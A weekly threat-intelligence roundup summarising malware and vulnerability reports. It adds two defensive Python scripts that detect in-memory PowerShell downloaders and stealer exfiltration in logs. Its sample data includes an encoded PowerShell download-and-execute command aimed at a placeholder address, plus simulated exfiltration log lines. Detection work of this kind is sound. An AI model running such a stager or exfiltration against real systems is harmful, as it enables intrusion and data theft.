Cybersecurity Wiretap #18: From Xeon Sender to PEAKLIGHT & QWERTY with Focus on “WireServing” (week of 08/19/2024)

1.MoonPeak malware from North Korean actors unveils new details on attacker infrastructure by @TalosSecurity

  • campaign distributes a variant of the open-source XenoRAT malware that Talos calls “MoonPeak,” a remote access trojan (RAT) that remains active

https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/

2.Xeon Sender | SMS Spam Shipping Multi-Tool Targeting SaaS Credentials by @LabsSentinel

  • Python script that sends spam through 9 SaaS providers; it has been repurposed by multiple threat actors who brand the tool as their own, a common occurrence in the cloud hacktool scene

https://www.sentinelone.com/labs/xeon-sender-sms-spam-shipping-multi-tool-targeting-saas-credentials/

3.Technical Analysis of Copybara by @Threatlabz

  • primarily spread through voice phishing (vishing) attacks, where victims receive instructions over the phone to install the Android malware

https://www.zscaler.com/blogs/security-research/technical-analysis-copybara

4.Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware by #PaloAlto‘s #Unit42

  • shows a new shift toward extorting victims directly, rather than the group’s traditional tactic of selling or publishing stolen data

https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/

5.PEAKLIGHT: Decoding the Stealthy Memory-Only Malware by @Mandiant

  • new memory-only dropper using a complex, multi-stage infection process
  • decrypts and executes a PowerShell-based downloader

https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware
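PEAKLIGHT’s final stage is a PowerShell downloader that runs from memory, so the process-creation telemetry that stage leaves behind is a practical place to catch it. The following is an added example (not Mandiant’s code) of triage logic that decodes a `-EncodedCommand` argument and flags PowerShell that both fetches content from the network and executes it in memory, weighting the finding when a script host such as mshta.exe is the parent. The event schema, the parent-process list and the sample events are constructed for this example.

```python
"""Triage process-creation events for PowerShell stages that fetch and run code in memory.

Added example for the PEAKLIGHT item; not Mandiant's code. The event schema, the list
of script-host parents and the sample events below are constructed assumptions.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as recorded by an EDR/Sysmon-style sensor


# Script hosts and LOLBins that commonly hand off to PowerShell in multi-stage droppers (assumed list).
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Primitives that pull content from the network ...
NET_FETCH = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient", re.I)
# ... and primitives that run it without writing a file to disk.
IN_MEMORY_EXEC = re.compile(
    r"Invoke-Expression|\biex\b|FromBase64String|\[Reflection\.Assembly\]::Load|Add-Type", re.I)
HIDDEN_OR_BYPASS = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)


def decode_encoded_command(command_line: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command; leave the raw line for the analyst


def triage(events):
    """Return findings for PowerShell launches that both fetch from the network and execute in memory."""
    findings = []
    for ev in events:
        if not ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        decoded = decode_encoded_command(ev.command_line)
        # Inspect the decoded script as well: the interesting cmdlets usually sit inside the base64.
        text = ev.command_line if decoded is None else ev.command_line + "\n" + decoded
        fetches = NET_FETCH.search(text) is not None
        executes = IN_MEMORY_EXEC.search(text) is not None
        if not (fetches and executes):
            continue  # downloads written to disk or plain admin scripts are not this pattern
        reasons = ["fetches content from the network", "executes it in memory"]
        parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
        if parent in SCRIPT_HOST_PARENTS:
            reasons.append(f"spawned by script host {parent}")
        if decoded is not None:
            reasons.append("command passed via -EncodedCommand")
        if HIDDEN_OR_BYPASS.search(ev.command_line):
            reasons.append("hidden window / execution-policy bypass switches")
        findings.append({"event": ev, "decoded": decoded, "reasons": reasons})
    return findings


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events. 203.0.113.7 is a TEST-NET address, not a real C2.
STAGE = "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://203.0.113.7/stage.ps1')"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -ep bypass -enc " + encode_for_powershell(STAGE)),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Program Files\PowerShell\7\pwsh.exe",
              'pwsh.exe -c "Invoke-WebRequest https://example.org/tool.zip -OutFile C:\\tmp\\tool.zip"'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["event"].command_line[:60], "->", "; ".join(f["reasons"]))
```

Only the first sample event is reported: the second is an ordinary admin command, and the third downloads to disk rather than into memory, which is exactly the distinction the “memory-only” label draws. Requiring both a fetch and an in-memory execution primitive keeps encoded or hidden-window PowerShell from management tooling out of the alert queue; those switches only raise the severity of a finding.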

6.“WireServing” Up Credentials: Escalating Privileges in Azure Kubernetes Services by @Mandiant

  • an attacker with access to a vulnerable Microsoft Azure Kubernetes Services (AKS) cluster could have escalated privileges and accessed credentials for services used by the cluster

https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services

7.NGate Android malware relays NFC traffic to steal cash by @ESETresearch

  • attackers were able to clone NFC data from victims’ physical payment cards using NGate and relay it to an attacker-controlled device, which then emulated the original card to withdraw cash

https://www.welivesecurity.com/en/eset-research/ngate-android-malware-relays-nfc-traffic-to-steal-cash/

8.Be careful what you pwish for – Phishing in PWA applications by @ESETresearch

  • standard phishing delivery combined with a novel phishing method: targeting Android and iOS users via PWAs
  • installing a PWA/WebAPK does not trigger the usual warning about installing an app from a third-party source

https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/

9.A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise by @CyfirmaR

  • 32-bit Win32 exe written in .NET, deploys 2 payloads
  • primary payload – potent data-stealing malware, targets sensitive info & exfils it via Telegram

https://www.cyfirma.com/research/a-comprehensive-analysis-of-angry-stealer-rage-stealer-in-a-new-disguise/

10.CVE-2024-30078 Remote Code Execution Vulnerability Analysis and Exploitation by @CyfirmaR

  • vulnerability in the Wi-Fi drivers of multiple Windows OS versions, potentially enabling an attacker within Wi-Fi range to remotely execute malicious code on susceptible systems

https://www.cyfirma.com/research/cve-2024-30078-remote-code-execution-vulnerability-analysis-and-exploitation/

11.QWERTY INFORMATION STEALER by @CyfirmaR

  • hosted on a Linux-based VPS in Frankfurt, DE
  • gathers system info & Internet Explorer (IE) data
  • downloads & executes additional payloads, indexes all files & uploads them to the C2 server
  • uses the string ‘qwerty’ in HTTP calls during exfiltration

https://www.cyfirma.com/research/qwerty-information-stealer/
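Items 9 and 11 both describe stealers that exfiltrate over HTTP: Angry Stealer through the Telegram Bot API, and QWERTY with a recognisable ‘qwerty’ string in its requests and a bulk upload of indexed files. As an added example (not Cyfirma’s code), here is proxy-log triage that covers both, plus a bulk-upload heuristic for the “indexes all files & uploads to C2” behaviour. The log line format, the 5 MB threshold, the allowlisted backup host and every sample line are constructed assumptions; the Telegram Bot API path shape (`/bot<id>:<secret>/send…`) is the public API’s documented form.

```python
"""Proxy-log triage for stealer exfiltration over HTTP.

Added example for the Angry Stealer (Telegram) and QWERTY items; not Cyfirma's code.
The log format, thresholds, allowlist and sample lines below are constructed assumptions.
"""
import re
from collections import defaultdict

# Assumed proxy line format: ts client method host path "user-agent" bytes_out
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) '
    r'"(?P<ua>[^"]*)" (?P<bytes_out>\d+)$'
)
# Telegram Bot API message/upload methods: /bot<id>:<secret>/send...
TELEGRAM_SEND = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>send\w+)")
QWERTY_MARKER = re.compile(r"qwerty", re.I)
BULK_UPLOAD_BYTES = 5_000_000                   # assumed threshold; tune per environment
TRUSTED_UPLOAD_HOSTS = {"backup.example.org"}   # assumed allowlist of legitimate upload targets


def parse(lines):
    """Yield parsed records; lines that do not match the assumed format are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["bytes_out"] = int(rec["bytes_out"])
            yield rec


def triage(lines):
    """Return findings: Telegram bot exfil, the 'qwerty' marker, and bulk uploads per (client, host)."""
    findings = []
    uploaded = defaultdict(int)  # (client, host) -> bytes sent in POST/PUT bodies
    for rec in parse(lines):
        base = {"ts": rec["ts"], "client": rec["client"], "host": rec["host"]}
        if rec["host"].lower() == "api.telegram.org":
            tg = TELEGRAM_SEND.match(rec["path"])
            if tg:
                # Keep the bot id for hunting, but never copy the secret into alerts or tickets.
                findings.append({**base, "rule": "telegram-bot-exfil",
                                 "evidence": f"bot {tg['bot_id']} {tg['method']} (secret redacted)"})
        if QWERTY_MARKER.search(rec["path"]) or QWERTY_MARKER.search(rec["ua"]):
            findings.append({**base, "rule": "qwerty-marker",
                             "evidence": f"{rec['method']} {rec['path']} ua={rec['ua']!r}"})
        if rec["method"] in ("POST", "PUT") and rec["host"].lower() not in TRUSTED_UPLOAD_HOSTS:
            uploaded[(rec["client"], rec["host"])] += rec["bytes_out"]
    for (client, host), total in uploaded.items():
        if total >= BULK_UPLOAD_BYTES:
            findings.append({"client": client, "host": host, "rule": "bulk-upload",
                             "evidence": f"{total} bytes uploaded in the window"})
    return findings


# Constructed sample log. 198.51.100.40 is a TEST-NET address; the bot token is a placeholder.
SAMPLE_LOG = """
2024-08-20T10:02:09Z 10.0.0.15 GET api.telegram.org /bot000000000:SAMPLEtokenNOTreal/getMe "Mozilla/5.0" 0
2024-08-20T10:02:11Z 10.0.0.15 POST api.telegram.org /bot000000000:SAMPLEtokenNOTreal/sendDocument "Mozilla/5.0" 184320
2024-08-20T10:05:41Z 10.0.0.22 POST 198.51.100.40 /qwerty/upload?host=DESKTOP-01 "qwerty-agent" 3100000
2024-08-20T10:06:03Z 10.0.0.22 POST 198.51.100.40 /qwerty/upload?host=DESKTOP-01 "qwerty-agent" 3300000
2024-08-20T10:07:15Z 10.0.0.31 GET www.example.org /index.html "Mozilla/5.0" 0
2024-08-20T10:08:00Z 10.0.0.31 POST backup.example.org /api/upload "BackupClient/2.1" 9000000
""".strip().splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["rule"], f["client"], f["host"], f["evidence"])
```

The bulk-upload heuristic sits behind an allowlist on purpose: on its own it fires on backup agents and cloud sync, so treat it as corroboration for the other two rules rather than a standalone alert. The Telegram finding deliberately drops the bot secret from the evidence string; the bot id is enough to pivot on, and the secret would otherwise end up in tickets and chat.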

Thanks a lot for reading.
